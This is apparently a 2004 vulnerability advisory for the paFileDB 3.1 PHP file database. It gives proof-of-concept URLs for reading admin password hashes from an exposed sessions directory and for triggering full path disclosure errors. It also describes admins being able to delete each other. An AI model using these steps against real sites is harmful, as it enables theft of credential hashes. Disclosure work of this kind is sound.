Multiple Vulnerabilities in paFileDB 3.1
ECHO_ADV_09$2004
---------------------------------------------------------------------------
Multiple Vulnerabilities in paFileDB 3.1
---------------------------------------------------------------------------
Author: y3dips
Date: November, 26th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv09-y3dips-2004.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
paFileDB 3.1 ( PHP ARENA ) Written by Todd ( todd@xxxxxxxxxxxx )
web : http://www.phparena.net
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
1. Possible to see Admin Hash Password if using sessions method
If the site using sessions to handle the authentication in the site, Attacker
could access the directory "sessions" and see the sessions in the same
time when the admin log in to manage the site (which is include admin hash
password)
----- snip from manual page -----
In order to reduce compatibility problems, paFileDB 3.0 Final can use either
sessions or cookies. Cookies are recommended and enabled by default, because
there's less compatibility issues and unlike sessions, cookies don't require
any data to be stored on the server.
...
To switch between sessions and cookies, open up pafiledb.php and look for
the text:
$authmethod = "cookies"; OR :
$authmethod = "sessions";
...
Before you make the switch to sessions, make a directory called "sessions"
in your paFileDB folder (same folder as pafiledb.php) and CHMOD the directory
777.
----- snip ------
POC
Scenario :
* admin (dudul) log in to manage the site at
http://URL/pafiledb/pafiledb.php?action=admin ,then the session is recorded in
sessions directory
+ attacker access the directory directly and see the "sessions" (in a same
time)
Exploit: http://URL/pafiledb/sessions/[sessionfile]
then access the listing sessions file
example : 'sess_12c9d926184e836451a15ed837bb875d'
which is contain
user|s:5:"dudul";pass|s:32:"810f9f3fbad17446a22ed2e516a12c36";
ip|s:32:"f528764d624db129b32c21fbca0cb8d6";
---- info that attacker get ----
user : dudul
pass : 810f9f3fbad17446a22ed2e516a12c36 <-- MD5
----------------------------------------------------------------------------
2. Full path disclosure
A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.
read my artikel about path disclosure with Indonesian language at
http://ezine.echo.or.id/ezine8/ez-r08-y3dips-pathdisc.txt
POC :
http://URL/pafiledb/includes/admin/admins.php
Fatal error: Call to undefined function: adlocbar() in
/var/www/html/pafiledb/includes/admin/admins.php on line 13
http://URL/pafiledb/includes/admin/category.php
Fatal error: Call to undefined function: adlocbar() in
/var/www/html/pafiledb/includes/admin/category.php on line 232
http://URL/pafiledb/includes/team.php
Warning: main(./includes/team/login.php): failed to open stream:
No such file or directory in /var/www/html/pafiledb/includes/team.php on line
17
Warning: main(): Failed opening './includes/team/login.php' for inclusion
(include_path='.:/usr/share/pear')
in /var/www/html/pafiledb/includes/team.php on line 17
- - - - - - - - - -
FIX it :
For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error
----------------------------------------------------------------------------
3. Possible to Have No Admin Account
All admin have same power, so every admin could delete another admin until
there is no admin left , if all admin acount deleted, so all admin could not
log
in to manage the site
----------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ newbie_hacker@xxxxxxxxxxxxxxx ,
~ #e-c-h-o & #aikmel @DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ---------------------------------